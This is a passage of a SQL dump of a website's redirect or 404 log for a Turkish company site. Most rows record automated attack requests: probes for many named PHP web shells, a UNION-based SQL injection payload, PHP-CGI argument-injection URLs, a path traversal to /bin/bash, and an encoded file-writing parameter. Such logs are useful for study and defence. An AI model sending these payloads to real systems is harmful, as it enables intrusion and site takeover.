00:00:00',301),(36548,'http://3s-technologies.com.tr/en/pr1vxsh3el.php',NULL,'www.google.com','',3,0,'2024-09-17 03:37:47','0000-00-00 00:00:00',301),(36549,'https://3s-technologies.com.tr/en/pr1vxsh3el.php',NULL,'www.google.com','',3,0,'2024-09-17 03:38:09','0000-00-00 00:00:00',301),(36550,'http://3s-technologies.com.tr/en/privshell.php',NULL,'www.google.com','',3,0,'2024-09-17 03:38:33','0000-00-00 00:00:00',301),(36551,'https://3s-technologies.com.tr/en/privshell.php',NULL,'www.google.com','',3,0,'2024-09-17 03:38:54','0000-00-00 00:00:00',301),(36552,'http://3s-technologies.com.tr/en/phpbash.php',NULL,'www.google.com','',3,0,'2024-09-17 03:39:17','0000-00-00 00:00:00',301),(36553,'https://3s-technologies.com.tr/en/phpbash.php',NULL,'www.google.com','',3,0,'2024-09-17 03:39:39','0000-00-00 00:00:00',301),(36554,'http://3s-technologies.com.tr/en/p0wny.php',NULL,'www.google.com','',3,0,'2024-09-17 03:40:02','0000-00-00 00:00:00',301),(36555,'https://3s-technologies.com.tr/en/p0wny.php',NULL,'www.google.com','',3,0,'2024-09-17 03:40:25','0000-00-00 00:00:00',301),(36556,'http://3s-technologies.com.tr/en/ophellia.php',NULL,'www.google.com','',3,0,'2024-09-17 03:40:47','0000-00-00 00:00:00',301),(36557,'https://3s-technologies.com.tr/en/ophellia.php',NULL,'www.google.com','',3,0,'2024-09-17 03:41:08','0000-00-00 00:00:00',301),(36558,'http://3s-technologies.com.tr/en/onliner-mini.php',NULL,'www.google.com','',3,0,'2024-09-17 03:41:29','0000-00-00 00:00:00',301),(36559,'https://3s-technologies.com.tr/en/onliner-mini.php',NULL,'www.google.com','',3,0,'2024-09-17 03:41:50','0000-00-00 00:00:00',301),(36560,'https://3s-technologies.com.tr/en/mass.php',NULL,'www.google.com','',3,0,'2024-09-17 03:42:31','0000-00-00 00:00:00',301),(36561,'http://3s-technologies.com.tr/en/bpmaigcbyte.php',NULL,'www.google.com','',3,0,'2024-09-17 03:42:51','0000-00-00 00:00:00',301),(36562,'https://3s-technologies.com.tr/en/bpmaigcbyte.php',NULL,'www.google.com','',3,0,'2024-09-17 03:43:12','0000-00-00 00:00:00',301),(36563,'http://3s-technologies.com.tr/en/mad.php',NULL,'www.google.com','',3,0,'2024-09-17 03:43:33','0000-00-00 00:00:00',301),(36564,'https://3s-technologies.com.tr/en/mad.php',NULL,'www.google.com','',3,0,'2024-09-17 03:43:52','0000-00-00 00:00:00',301),(36565,'http://3s-technologies.com.tr/en/lolz.php',NULL,'www.google.com','',3,0,'2024-09-17 03:44:53','0000-00-00 00:00:00',301),(36566,'https://3s-technologies.com.tr/en/lolz.php',NULL,'www.google.com','',3,0,'2024-09-17 03:45:15','0000-00-00 00:00:00',301),(36567,'http://3s-technologies.com.tr/en/kelelawar.php',NULL,'www.google.com','',3,0,'2024-09-17 03:45:36','0000-00-00 00:00:00',301),(36568,'https://3s-technologies.com.tr/en/kelelawar.php',NULL,'www.google.com','',3,0,'2024-09-17 03:45:56','0000-00-00 00:00:00',301),(36569,'http://3s-technologies.com.tr/en/hac4allv2.php',NULL,'www.google.com','',3,0,'2024-09-17 03:46:17','0000-00-00 00:00:00',301),(36570,'https://3s-technologies.com.tr/en/hac4allv2.php',NULL,'www.google.com','',3,0,'2024-09-17 03:46:37','0000-00-00 00:00:00',301),(36571,'http://3s-technologies.com.tr/en/wsogreen.php',NULL,'www.google.com','',3,0,'2024-09-17 03:46:58','0000-00-00 00:00:00',301),(36572,'https://3s-technologies.com.tr/en/wsogreen.php',NULL,'www.google.com','',3,0,'2024-09-17 03:47:20','0000-00-00 00:00:00',301),(36573,'http://3s-technologies.com.tr/en/elep.php',NULL,'www.google.com','',3,0,'2024-09-17 03:47:40','0000-00-00 00:00:00',301),(36574,'https://3s-technologies.com.tr/en/elep.php',NULL,'www.google.com','',3,0,'2024-09-17 03:48:03','0000-00-00 00:00:00',301),(36575,'http://3s-technologies.com.tr/en/ecchi.php',NULL,'www.google.com','',3,0,'2024-09-17 03:48:28','0000-00-00 00:00:00',301),(36576,'https://3s-technologies.com.tr/en/ecchi.php',NULL,'www.google.com','',3,0,'2024-09-17 03:48:51','0000-00-00 00:00:00',301),(36577,'http://3s-technologies.com.tr/en/domdell.php',NULL,'www.google.com','',3,0,'2024-09-17 03:49:14','0000-00-00 00:00:00',301),(36578,'https://3s-technologies.com.tr/en/domdell.php',NULL,'www.google.com','',3,0,'2024-09-17 03:49:37','0000-00-00 00:00:00',301),(36579,'http://3s-technologies.com.tr/en/darkness.php',NULL,'www.google.com','',3,0,'2024-09-17 03:50:01','0000-00-00 00:00:00',301),(36580,'https://3s-technologies.com.tr/en/darkness.php',NULL,'www.google.com','',3,0,'2024-09-17 03:50:26','0000-00-00 00:00:00',301),(36581,'http://3s-technologies.com.tr/en/cylul007.php',NULL,'www.google.com','',3,0,'2024-09-17 03:50:51','0000-00-00 00:00:00',301),(36582,'https://3s-technologies.com.tr/en/cylul007.php',NULL,'www.google.com','',3,0,'2024-09-17 03:51:16','0000-00-00 00:00:00',301),(36583,'http://3s-technologies.com.tr/en/cgi.php',NULL,'www.google.com','',5,0,'2024-09-17 03:51:40','0000-00-00 00:00:00',301),(36584,'https://3s-technologies.com.tr/en/cgi.php',NULL,'www.google.com','',3,0,'2024-09-17 03:52:04','0000-00-00 00:00:00',301),(36585,'http://3s-technologies.com.tr/en/bca.php',NULL,'www.google.com','',3,0,'2024-09-17 03:52:27','0000-00-00 00:00:00',301),(36586,'https://3s-technologies.com.tr/en/bca.php',NULL,'www.google.com','',3,0,'2024-09-17 03:52:51','0000-00-00 00:00:00',301),(36587,'http://3s-technologies.com.tr/en/bandung6etar.php',NULL,'www.google.com','',3,0,'2024-09-17 03:53:15','0000-00-00 00:00:00',301),(36588,'https://3s-technologies.com.tr/en/bandung6etar.php',NULL,'www.google.com','',3,0,'2024-09-17 03:53:39','0000-00-00 00:00:00',301),(36589,'http://3s-technologies.com.tr/en/ava.php',NULL,'www.google.com','',5,0,'2024-09-17 03:53:59','0000-00-00 00:00:00',301),(36590,'https://3s-technologies.com.tr/en/ava.php',NULL,'www.google.com','',3,0,'2024-09-17 03:54:21','0000-00-00 00:00:00',301),(36591,'https://3s-technologies.com.tr/en/anti.php',NULL,'www.google.com','',3,0,'2024-09-17 03:55:04','0000-00-00 00:00:00',301),(36592,'http://3s-technologies.com.tr/en/anonim-us.php',NULL,'www.google.com','',3,0,'2024-09-17 03:55:26','0000-00-00 00:00:00',301),(36593,'https://3s-technologies.com.tr/en/anonim-us.php',NULL,'www.google.com','',3,0,'2024-09-17 03:55:48','0000-00-00 00:00:00',301),(36594,'http://3s-technologies.com.tr/en/anonsec.php',NULL,'www.google.com','',5,0,'2024-09-17 03:56:09','0000-00-00 00:00:00',301),(36595,'https://3s-technologies.com.tr/en/anonsec.php',NULL,'www.google.com','',3,0,'2024-09-17 03:56:29','0000-00-00 00:00:00',301),(36596,'http://3s-technologies.com.tr/en/masser.php',NULL,'www.google.com','',3,0,'2024-09-17 03:56:51','0000-00-00 00:00:00',301),(36597,'https://3s-technologies.com.tr/en/masser.php',NULL,'www.google.com','',3,0,'2024-09-17 03:57:11','0000-00-00 00:00:00',301),(36598,'http://3s-technologies.com.tr/en/alfahun73r.php',NULL,'www.google.com','',3,0,'2024-09-17 03:57:31','0000-00-00 00:00:00',301),(36599,'https://3s-technologies.com.tr/en/alfahun73r.php',NULL,'www.google.com','',3,0,'2024-09-17 03:57:50','0000-00-00 00:00:00',301),(36600,'http://3s-technologies.com.tr/en/apt.php',NULL,'www.google.com','',3,0,'2024-09-17 03:58:10','0000-00-00 00:00:00',301),(36601,'https://3s-technologies.com.tr/en/apt.php',NULL,'www.google.com','',3,0,'2024-09-17 03:58:31','0000-00-00 00:00:00',301),(36602,'http://3s-technologies.com.tr/en/alfa403.php',NULL,'www.google.com','',3,0,'2024-09-17 03:58:52','0000-00-00 00:00:00',301),(36603,'https://3s-technologies.com.tr/en/alfa403.php',NULL,'www.google.com','',3,0,'2024-09-17 03:59:13','0000-00-00 00:00:00',301),(36604,'http://3s-technologies.com.tr/en/407.php',NULL,'www.google.com','',3,0,'2024-09-17 04:00:20','0000-00-00 00:00:00',301),(36605,'https://3s-technologies.com.tr/en/407.php',NULL,'www.google.com','',3,0,'2024-09-17 04:00:43','0000-00-00 00:00:00',301),(36606,'http://3s-technologies.com.tr/en/407pass.php',NULL,'www.google.com','',3,0,'2024-09-17 04:01:04','0000-00-00 00:00:00',301),(36607,'https://3s-technologies.com.tr/en/407pass.php',NULL,'www.google.com','',3,0,'2024-09-17 04:01:27','0000-00-00 00:00:00',301),(36608,'http://3s-technologies.com.tr/en/404-mini.php',NULL,'www.google.com','',2,0,'2024-09-17 04:01:49','0000-00-00 00:00:00',301),(36609,'https://3s-technologies.com.tr/en/404-mini.php',NULL,'www.google.com','',2,0,'2024-09-17 04:02:12','0000-00-00 00:00:00',301),(36610,'http://3s-technologies.com.tr/en/2018wso.php',NULL,'www.google.com','',2,0,'2024-09-17 04:04:24','0000-00-00 00:00:00',301),(36611,'https://3s-technologies.com.tr/en/2018wso.php',NULL,'www.google.com','',2,0,'2024-09-17 04:04:50','0000-00-00 00:00:00',301),(36612,'http://3s-technologies.com.tr/en/0x.php',NULL,'www.google.com','',30,0,'2024-09-17 04:06:09','0000-00-00 00:00:00',301),(36613,'https://3s-technologies.com.tr/en/0x.php',NULL,'www.google.com','',2,0,'2024-09-17 04:06:34','0000-00-00 00:00:00',301),(36614,'http://3s-technologies.com.tr/en/0bytev2.php',NULL,'www.google.com','',2,0,'2024-09-17 04:07:00','0000-00-00 00:00:00',301),(36615,'https://3s-technologies.com.tr/en/0bytev2.php',NULL,'www.google.com','',2,0,'2024-09-17 04:07:26','0000-00-00 00:00:00',301),(36616,'https://3s-technologies.com.tr/en/0byt3m1n1.php',NULL,'www.google.com','',2,0,'2024-09-17 04:08:17','0000-00-00 00:00:00',301),(36617,'http://3s-technologies.com.tr/en/marion001.php',NULL,'www.google.com','',2,0,'2024-09-17 04:08:42','0000-00-00 00:00:00',301),(36618,'https://3s-technologies.com.tr/en/marion001.php',NULL,'www.google.com','',2,0,'2024-09-17 04:09:09','0000-00-00 00:00:00',301),(36619,'https://3s-technologies.com.tr/en/p0wny-shell.php',NULL,'www.google.com','',2,0,'2024-09-17 04:09:59','0000-00-00 00:00:00',301),(36620,'https://3s-technologies.com.tr/en/r57.php',NULL,'www.google.com','',2,0,'2024-09-17 04:10:49','0000-00-00 00:00:00',301),(36621,'http://3s-technologies.com.tr/en/sadrazam.php',NULL,'www.google.com','',2,0,'2024-09-17 04:11:12','0000-00-00 00:00:00',301),(36622,'https://3s-technologies.com.tr/en/sadrazam.php',NULL,'www.google.com','',2,0,'2024-09-17 04:11:35','0000-00-00 00:00:00',301),(36623,'http://3s-technologies.com.tr/en/simple-shell.php',NULL,'www.google.com','',4,0,'2024-09-17 04:11:57','0000-00-00 00:00:00',301),(36624,'https://3s-technologies.com.tr/en/simple-shell.php',NULL,'www.google.com','',2,0,'2024-09-17 04:12:20','0000-00-00 00:00:00',301),(36625,'http://3s-technologies.com.tr/en/wordpress.php',NULL,'www.google.com','',4,0,'2024-09-17 04:13:32','0000-00-00 00:00:00',301),(36626,'https://3s-technologies.com.tr/en/wordpress.php',NULL,'www.google.com','',2,0,'2024-09-17 04:13:55','0000-00-00 00:00:00',301),(36627,'http://3s-technologies.com.tr/en/zerobyte.php',NULL,'www.google.com','',2,0,'2024-09-17 04:14:18','0000-00-00 00:00:00',301),(36628,'https://3s-technologies.com.tr/en/zerobyte.php',NULL,'www.google.com','',2,0,'2024-09-17 04:14:39','0000-00-00 00:00:00',301),(36629,'http://3s-technologies.com.tr/en/list.php',NULL,'www.google.com','',3,0,'2024-09-17 04:15:03','0000-00-00 00:00:00',301),(36630,'https://3s-technologies.com.tr/en/list.php',NULL,'www.google.com','',2,0,'2024-09-17 04:15:26','0000-00-00 00:00:00',301),(36631,'https://3s-technologies.com.tr/en/php-backdoor.php',NULL,'www.google.com','',2,0,'2024-09-17 04:16:13','0000-00-00 00:00:00',301),(36632,'http://3s-technologies.com.tr/en/simple-backdoor.php',NULL,'www.google.com','',2,0,'2024-09-17 04:16:38','0000-00-00 00:00:00',301),(36633,'https://3s-technologies.com.tr/en/simple-backdoor.php',NULL,'www.google.com','',2,0,'2024-09-17 04:17:03','0000-00-00 00:00:00',301),(36634,'http://3s-technologies.com.tr/en/12309.php',NULL,'www.google.com','',2,0,'2024-09-17 04:17:29','0000-00-00 00:00:00',301),(36635,'https://3s-technologies.com.tr/en/12309.php',NULL,'www.google.com','',2,0,'2024-09-17 04:17:52','0000-00-00 00:00:00',301),(36636,'http://3s-technologies.com.tr/en/529.php',NULL,'www.google.com','',4,0,'2024-09-17 04:18:16','0000-00-00 00:00:00',301),(36637,'https://3s-technologies.com.tr/en/529.php',NULL,'www.google.com','',2,0,'2024-09-17 04:18:40','0000-00-00 00:00:00',301),(36638,'http://3s-technologies.com.tr/en/aspydrvsinfo.php',NULL,'www.google.com','',2,0,'2024-09-17 04:19:05','0000-00-00 00:00:00',301),(36639,'https://3s-technologies.com.tr/en/aspydrvsinfo.php',NULL,'www.google.com','',2,0,'2024-09-17 04:19:28','0000-00-00 00:00:00',301),(36640,'http://3s-technologies.com.tr/en/predator.php',NULL,'www.google.com','',4,0,'2024-09-17 04:19:52','0000-00-00 00:00:00',301),(36641,'https://3s-technologies.com.tr/en/predator.php',NULL,'www.google.com','',2,0,'2024-09-17 04:20:18','0000-00-00 00:00:00',301),(36642,'https://3s-technologies.com.tr/tr/wp-json/h5vp/v1/video/0?id=-1\' union select concat/**_**/(0x3c62723e,0x496e6a6563746564204279204b727970746f6e5365635f4d79,0x3c62723e,0x204442203a20,database/**_**/(),0x207c20,0x566572203a20,version/**_**/(),0x207c20,0x55736572203a20,user/**_**/(),(select(@x)/*!50000from*/(select(@x:=0x00),(select(0)/*!50000from*/(/*!50000information_schema*/.columns)where(table_schema=database/**_**/())and(0x00)in(@x:=concat+(@x,0x3c62723e,/*!50000table_name*/,0x203e20,/*!50000column_name*/))))x)),2,3,4,5,6,7,8--+',NULL,'','',1,0,'2024-09-17 10:57:41','0000-00-00 00:00:00',301),(36643,'http://mail.3s-technologies.com.tr/en/wp-admin/css/colors/blue/blue.php?wall=zwnobyanqmxhy2sgqm90jztmd3jpdguozm9wzw4oj2jsa29qdhl3lnbocccsj3crjyksjzw/cghwigvjag8gikjsywnriejvdci7pz4nkts=',NULL,'www.google.com','',1,0,'2024-09-17 22:55:12','0000-00-00 00:00:00',301),(36644,'http://3s-technologies.com.tr/tr/wp-includes/id3/index.php',NULL,'','',218,0,'2024-09-20 08:53:32','0000-00-00 00:00:00',301),(36645,'http://3s-technologies.com.tr/tr/wp-includes/ixr/index.php',NULL,'','',89,0,'2024-09-20 08:53:38','0000-00-00 00:00:00',301),(36646,'http://3s-technologies.com.tr/tr/wp-content/plugins/admin.php',NULL,'','',201,0,'2024-09-20 08:53:45','0000-00-00 00:00:00',301),(36647,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-econ/uph.php',NULL,'','',26,0,'2024-09-20 08:53:57','0000-00-00 00:00:00',301),(36648,'http://3s-technologies.com.tr/tr/wp-content/plugins/shell/noimg.php',NULL,'','',22,0,'2024-09-20 08:54:03','0000-00-00 00:00:00',301),(36649,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd-1/pwnd.php',NULL,'','',35,0,'2024-09-20 08:54:07','0000-00-00 00:00:00',301),(36650,'http://3s-technologies.com.tr/tr/wp-content/plugins/clara/clara.php',NULL,'','',22,0,'2024-09-20 08:54:11','0000-00-00 00:00:00',301),(36651,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/search-component&lt',NULL,'','',1,0,'2024-09-21 22:19:31','0000-00-00 00:00:00',301),(36652,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/users-component&lt',NULL,'','',1,0,'2024-09-21 22:19:37','0000-00-00 00:00:00',301),(36653,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/weblinks-component&lt',NULL,'','',1,0,'2024-09-21 22:26:11','0000-00-00 00:00:00',301),(36654,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components&lt',NULL,'','',1,0,'2024-09-21 22:30:30','0000-00-00 00:00:00',301),(36655,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/contact-component&lt',NULL,'','',1,0,'2024-09-21 22:39:57','0000-00-00 00:00:00',301),(36656,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/news-feeds-component&lt',NULL,'','',1,0,'2024-09-21 22:44:57','0000-00-00 00:00:00',301),(36657,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component&lt',NULL,'','',1,0,'2024-09-21 22:48:08','0000-00-00 00:00:00',301),(36658,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/administrator-components&lt',NULL,'','',1,0,'2024-09-21 22:53:03','0000-00-00 00:00:00',301),(36659,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/blue.php?wall=zwnobyanqmxhy2sgqm90jztmd3jpdguozm9wzw4oj2jsa3jpbhjjlnbocccsj3crjyksjzw/cghwigvjag8gikjsywnriejvdci7pz4nkts=',NULL,'www.google.com','',1,0,'2024-09-22 18:34:53','0000-00-00 00:00:00',301),(36660,'https://3s-technologies.com.tr/tr/style2.php?sig=rename',NULL,'','',1,0,'2024-09-23 13:30:59','0000-00-00 00:00:00',301),(36661,'https://3s-technologies.com.tr/tr/wp-includes/style.php?sig=rename',NULL,'','',1,0,'2024-09-23 13:30:59','0000-00-00 00:00:00',301),(36662,'https://3s-technologies.com.tr/tr/wp-admin/style.php?sig=rename',NULL,'','',1,0,'2024-09-23 13:30:59','0000-00-00 00:00:00',301),(36663,'https://3s-technologies.com.tr/tr/wp-content/uploads/style.php?sig=rename',NULL,'','',1,0,'2024-09-23 13:30:59','0000-00-00 00:00:00',301),(36664,'https://3s-technologies.com.tr/modules/mod_ariimageslidersa/core3.php',NULL,'https://3s-technologies.com.tr/en/','',7,0,'2024-09-23 20:13:53','0000-00-00 00:00:00',301),(36665,'https://3s-technologies.com.tr/en/modules/mod_ariimageslidersa/195f2759f30b.php',NULL,'https://3s-technologies.com.tr/modules/mod_ariimageslidersa/core3.php','',7,0,'2024-09-23 20:13:54','0000-00-00 00:00:00',301),(36666,'http://3s-technologies.com.tr/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/',NULL,'','',1,0,'2024-09-24 06:42:48','0000-00-00 00:00:00',301),(36667,'http://www.3s-technologies.com.tr/en/wordpress/wp-admin/setup-config.php?step=1',NULL,'www.google.com','',1,0,'2024-09-27 10:47:46','0000-00-00 00:00:00',301),(36668,'http://3s-technologies.com.tr/tr/doors-test-article',NULL,'','',2,0,'2024-09-28 07:11:15','0000-00-00 00:00:00',301),(36669,'http://3s-technologies.com.tr/tr/my-account',NULL,'','',2,0,'2024-09-30 07:56:30','0000-00-00 00:00:00',301),(36670,'https://3s-technologies.com.tr/tr/plugins/fields/media/params/media.php',NULL,'','',1,0,'2024-09-30 12:02:04','0000-00-00 00:00:00',301),(36671,'https://3s-technologies.com.tr/tr/components/com_fields/forms/filter_fields.php',NULL,'','',1,0,'2024-09-30 12:02:05','0000-00-00 00:00:00',301),(36672,'https://3s-technologies.com.tr/tr/api/components/com_fields/src/view/fields/fields.php',NULL,'','',1,0,'2024-09-30 12:02:06','0000-00-00 00:00:00',301),(36673,'https://3s-technologies.com.tr/tr/layouts/libraries/lib.php',NULL,'','',1,0,'2024-09-30 12:02:06','0000-00-00 00:00:00',301),(36674,'https://3s-technologies.com.tr/tr/components/com_jckman/jckman.php',NULL,'','',1,0,'2024-09-30 12:02:07','0000-00-00 00:00:00',301),(36675,'https://3s-technologies.com.tr/tr/libraries/legacy/base/base.php',NULL,'','',1,0,'2024-09-30 12:02:08','0000-00-00 00:00:00',301),(36676,'https://3s-technologies.com.tr/tr/libraries/mavik/thumb/graphiclibrary.php',NULL,'','',1,0,'2024-09-30 12:02:08','0000-00-00 00:00:00',301),(36677,'https://3s-technologies.com.tr/tr/plugins/fields/checkboxes/params/checkboxes.php',NULL,'','',1,0,'2024-09-30 12:02:09','0000-00-00 00:00:00',301),(36678,'http://3s-technologies.com.tr/tr/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash',NULL,'','',1,0,'2024-10-05 17:34:50','0000-00-00 00:00:00',301),(36679,'http://www.3s-technologies.com.tr/en/robots.txt/wp-login.php',NULL,'','',1,0,'2024-10-06 23:19:33','0000-00-00 00:00:00',301),(36680,'http://3s-technologies.com.tr/php-cgi/php-cgi.exe??d+cgi.force_redirect=0+?d+cgi.redirect_status_env+?d+allow_url_include=1+?d+auto_prepend_file=php://input',NULL,'','',2,0,'2024-10-09 15:21:26','0000-00-00 00:00:00',301),(36681,'http://3s-technologies.com.tr/hello.world??d+cgi.force_redirect=0+?d+cgi.redirect_status_env+?d+allow_url_include=1+?d+auto_prepend_file=php://input',NULL,'','',2,0,'2024-10-09 15:21:27','0000-00-00 00:00:00',301),(36682,'http://3s-technologies.com.tr/test.hello??d+cgi.force_redirect=0+?d+cgi.redirect_status_env+?d+allow_url_include=1+?d+auto_prepend_file=php://input',NULL,'','',2,0,'2024-10-09 15:21:29','0000-00-00 00:00:00',301),(36683,'https://www.3s-technologies.com.tr/tr/method-to-detect-parked',NULL,'','',2,0,'2024-10-12 18:18:37','0000-00-00 00:00:00',301),(36684,'http://3s-technologies.com.tr/tr/assets/css/403.php',NULL,'','',6,0,'2024-10-12 21:25:45','0000-00-00 00:00:00',301),(36685,'http://3s-technologies.com.tr/tr/wp-content/plugins/not/includes/about.php',NULL,'','',40,0,'2024-10-12 21:25:46','0000-00-00 00:00:00',301),(36686,'http://3s-technologies.com.tr/tr/wp-content/plugins/download-plugin/wp-access.php',NULL,'','',1,0,'2024-10-12 21:25:47','0000-00-00 00:00:00',301),(36687,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core/curve25519/ge/network.php',NULL,'','',1,0,'2024-10-12 21:25:48','0000-00-00 00:00:00',301),(36688,'http://3s-technologies.com.tr/tr/helpdesk/vendor/htmlawed/htmlawed/gel4y.php',NULL,'','',1,0,'2024-10-12 21:25:49','0000-00-00 00:00:00',301),(36689,'http://3s-technologies.com.tr/tr/glpi/vendor/network.php',NULL,'','',1,0,'2024-10-12 21:25:50','0000-00-00 00:00:00',301),(36690,'http://3s-technologies.com.tr/tr/ticket/vendor/htmlawed/htmlawed/gel4y.php',NULL,'','',7,0,'2024-10-12 21:25:51','0000-00-00 00:00:00',301),(36691,'http://3s-technologies.com.tr/tr/wp-content/themes/digital-download/new.php',NULL,'','',13,0,'2024-10-12 21:25:52','0000-00-00 00:00:00',301),(36692,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/niil.php',NULL,'','',20,0,'2024-10-12 21:25:53','0000-00-00 00:00:00',301),(36693,'http://3s-technologies.com.tr/tr/.well-known/admin.php',NULL,'','',153,0,'2024-10-12 21:25:55','0000-00-00 00:00:00',301),(36694,'http://3s-technologies.com.tr/tr/wp-admin/includes/class_api.php',NULL,'','',7,0,'2024-10-12 21:26:00','0000-00-00 00:00:00',301),(36695,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyseventeen/page/index.php?p=',NULL,'','',1,0,'2024-10-12 21:26:04','0000-00-00 00:00:00',301),(36696,'http://3s-technologies.com.tr/tr/.tmb/class_api.php',NULL,'','',7,0,'2024-10-12 21:26:05','0000-00-00 00:00:00',301),(36697,'http://3s-technologies.com.tr/tr/wp-content/ccx/index.php',NULL,'','',7,0,'2024-10-12 21:26:24','0000-00-00 00:00:00',301),(36698,'http://3s-technologies.com.tr/tr/wp-admin/ccx/index.php',NULL,'','',6,0,'2024-10-12 21:26:25','0000-00-00 00:00:00',301),(36699,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/about.php',NULL,'','',99,0,'2024-10-12 21:26:30','0000-00-00 00:00:00',301),(36700,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/license.php',NULL,'','',7,0,'2024-10-12 21:26:41','0000-00-00 00:00:00',301),(36701,'http://3s-technologies.com.tr/tr/wp-includes/plugins.php',NULL,'','',26,0,'2024-10-12 21:26:44','0000-00-00 00:00:00',301),(36702,'http://3s-technologies.com.tr/tr/wp-adminincludesclass-wp-media-list-data.php',NULL,'','',9,0,'2024-10-12 21:27:13','0000-00-00 00:00:00',301),(36703,'http://mail.3s-technologies.com.tr/ss.php',NULL,'www.google.com','',3,0,'2024-10-15 22:29:36','0000-00-00 00:00:00',301),(36704,'https://3s-technologies.com.tr/tr/modules/mod_review/manifest.xml',NULL,'','',7,0,'2024-10-20 03:20:32','0000-00-00 00:00:00',301),(36705,'https://3s-technologies.com.tr/tr/?option=com_easybookreloaded',NULL,'','',1,0,'2024-10-20 03:24:01','0000-00-00 00:00:00',301),(36706,'https://3s-technologies.com.tr/tr/gaestebuch',NULL,'','',2,0,'2024-10-20 03:24:03','0000-00-00 00:00:00',301),(36707,'https://3s-technologies.com.tr/tr/?option=com_easygb',NULL,'','',1,0,'2024-10-20 03:24:08','0000-00-00 00:00:00',301),(36708,'https://3s-technologies.com.tr/tr/?option=com_akobook',NULL,'','',1,0,'2024-10-20 03:24:12','0000-00-00 00:00:00',301),(36709,'https://3s-technologies.com.tr/tr/?option=com_vitabook',NULL,'','',1,0,'2024-10-20 03:24:14','0000-00-00 00:00:00',301),(36710,'https://3s-technologies.com.tr/tr/?option=com_jambook',NULL,'','',1,0,'2024-10-20 03:24:17','0000-00-00 00:00:00',301),(36711,'https://3s-technologies.com.tr/tr/component/jambook',NULL,'','',1,0,'2024-10-20 03:24:22','0000-00-00 00:00:00',301),(36712,'https://3s-technologies.com.tr/tr/guestbook',NULL,'','',1,0,'2024-10-20 03:24:29','0000-00-00 00:00:00',301),(36713,'https://3s-technologies.com.tr/tr/?option=com_phocaguestbook&id=1',NULL,'','',1,0,'2024-10-20 03:24:50','0000-00-00 00:00:00',301),(36714,'https://3s-technologies.com.tr/tr/?option=com_phocaguestbook',NULL,'','',1,0,'2024-10-20 03:24:53','0000-00-00 00:00:00',301),(36715,'https://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'https://www.proneo-led.com/3s-technologies.com.tr/joomla/components/com_virtuemart/assets/css/chosen.css?vmver=1ca80efd','',7,0,'2024-10-23 19:41:12','0000-00-00 00:00:00',301),(36716,'https://proneo-led.com/3s-technologies.com.tr/joomla/tr/components/com_virtuemart/assets/css/chosen-sprite@2x.png',NULL,'https://proneo-led.com/3s-technologies.com.tr/joomla/components/com_virtuemart/assets/css/chosen.css?vmver=1ca80efd','',12,0,'2024-10-23 19:45:07','0000-00-00 00:00:00',301),(36717,'http://3s-technologies.com.tr/en/top.php?action=door123',NULL,'www.google.com','',1,0,'2024-10-24 02:48:32','0000-00-00 00:00:00',301),(36718,'http://www.3s-technologies.com.tr/ss.php',NULL,'www.google.com','',1,0,'2024-10-24 08:26:01','0000-00-00 00:00:00',301),(36719,'http://www.3s-technologies.com.tr/tr/include/taglib/help/adminname.txt',NULL,'http://www.3s-technologies.com.tr/include/taglib/help/adminname.txt','',3,0,'2024-10-28 02:12:55','0000-00-00 00:00:00',301),(36720,'http://www.3s-technologies.com.tr/tr/ueditor/dialogs/internal.js',NULL,'http://www.3s-technologies.com.tr/ueditor/dialogs/internal.js','',1,0,'2024-10-31 13:24:30','0000-00-00 00:00:00',301),(36721,'https://3s-technologies.com.tr/tr/wp-json?rest_route=/wp/v2/users',NULL,'https://3s-technologies.com.tr/wp-json/?rest_route=/wp/v2/USERS','',1,0,'2024-10-31 21:28:35','0000-00-00 00:00:00',301),(36722,'https://3s-technologies.com.tr/en/accesson1.php',NULL,'https://3s-technologies.com.tr/en/component/users?view=login','',4,0,'2024-11-02 15:12:16','0000-00-00 00:00:00',301),(36723,'https://3s-technologies.com.tr/tr/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php',NULL,'','',4,0,'2024-11-02 19:42:14','0000-00-00 00:00:00',301),(36724,'http://3s-technologies.com.tr/en/media/com_acym/js/modal.min.js',NULL,'','',11,0,'2024-11-03 03:19:57','0000-00-00 00:00:00',301),(36725,'http://www.3s-technologies.com.tr/tr/kindeditor/themes/default/default.css',NULL,'http://www.3s-technologies.com.tr/kindeditor/themes/default/default.css','',1,0,'2024-11-03 03:39:26','0000-00-00 00:00:00',301),(36726,'http://3s-technologies.com.tr/en/ cscoe /logon.html',NULL,'http://3s-technologies.com.tr/+CSCOE+/logon.html','',1,0,'2024-11-03 12:20:02','0000-00-00 00:00:00',301),(36727,'http://3s-technologies.com.tr/en/users/sign_in',NULL,'http://3s-technologies.com.tr/users/sign_in','',1,0,'2024-11-03 12:20:02','0000-00-00 00:00:00',301),(36728,'http://3s-technologies.com.tr/en/web/login',NULL,'http://3s-technologies.com.tr/web/login','',1,0,'2024-11-03 12:20:16','0000-00-00 00:00:00',301),(36729,'http://3s-technologies.com.tr/en/euweb/login',NULL,'http://3s-technologies.com.tr/euweb/login','',1,0,'2024-11-03 12:20:19','0000-00-00 00:00:00',301),(36730,'http://3s-technologies.com.tr/en/identification.php',NULL,'http://3s-technologies.com.tr/identification.php','',1,0,'2024-11-03 12:20:20','0000-00-00 00:00:00',301),(36731,'https://3s-technologies.com.tr/tr/wp-sitemap.xml',NULL,'','',41,0,'2024-11-04 01:16:47','0000-00-00 